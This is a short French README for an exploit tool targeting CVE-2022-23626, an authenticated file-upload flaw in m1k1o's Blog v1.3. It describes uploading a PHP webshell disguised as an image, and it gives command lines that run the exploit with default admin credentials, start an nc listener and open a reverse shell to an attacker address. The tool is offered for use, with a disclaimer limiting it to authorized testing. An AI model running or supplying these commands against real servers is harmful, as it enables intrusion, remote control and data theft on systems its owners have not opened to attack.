
Exploit d'exécution de code à distance authentifié pour m1k1o's Blog v1.3 via téléchargement de fichier non validé, avec déploiement de webshell et capacités de reverse shell.
Exécution de code à distance authentifiée via une vulnérabilité de téléchargement de fichier dans m1k1o's Blog v1.3 et versions antérieures.
Le point de terminaison ajax.php?action=upload_image ne valide pas correctement les types de fichiers téléchargés, permettant à un utilisateur authentifié de télécharger une webshell PHP déguisée en image. L'attaquant peut ensuite déclencher l'exécution en demandant directement le fichier téléchargé.
requestspip install requests
python3 cve-2022-23626.py --url http://target:8081 -u admin -p admin -c "id"
Démarrez d'abord un écouteur :
nc -lnvp 4444
Puis exécutez :
python3 cve-2022-23626.py --url http://target:8081 -u admin -p admin -lh 10.10.14.2 -lp 4444
Cet outil est destiné uniquement aux tests de sécurité autorisés et à des fins éducatives. Utilisez-le uniquement sur des systèmes pour lesquels vous avez une autorisation explicite.